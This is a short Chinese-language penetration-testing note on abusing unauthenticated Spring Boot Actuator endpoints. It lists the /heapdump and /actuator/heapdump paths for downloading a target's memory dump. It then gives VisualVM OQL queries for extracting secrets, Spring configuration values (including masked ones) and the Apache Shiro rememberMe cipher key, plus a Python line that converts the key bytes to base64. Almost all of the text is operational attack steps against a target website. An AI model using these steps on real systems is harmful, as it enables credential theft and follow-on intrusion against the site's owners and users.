actuator 下載heapdump 文件
若目標網站存在actuator未授權訪問漏洞,一般訪問如下鏈接可下載內存文件
/heapdump
/actuator/heapdump
工具
利用 visualvm 打開下載的heapdump文件
https://visualvm.github.io/download.html
根據 env 中的字符串查找secret
打開visualvm右邊選擇OQL Console, 下方輸入如下,點擊查詢
select s from java.lang.String s
where /wx081111111/.test(s.value.toString())
根據查詢結果可以獲取到secret
查找spring config中的配置
右上角點擊Objects 下方輸入框輸入,點擊查詢,也可以獲取到前台打碼的信息
org.springframework.core.env.MapPropertySource
查找Shiro CipherKey
過濾條件輸入
org.apache.shiro.web.mgt.CookieRememberMeManager
可通過下面python代碼將byte 轉換成base64編碼的key
base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -108,-108,-108,-108,52,-80,-42,-32,34,-68,3,-109,111,-43,-81,-25))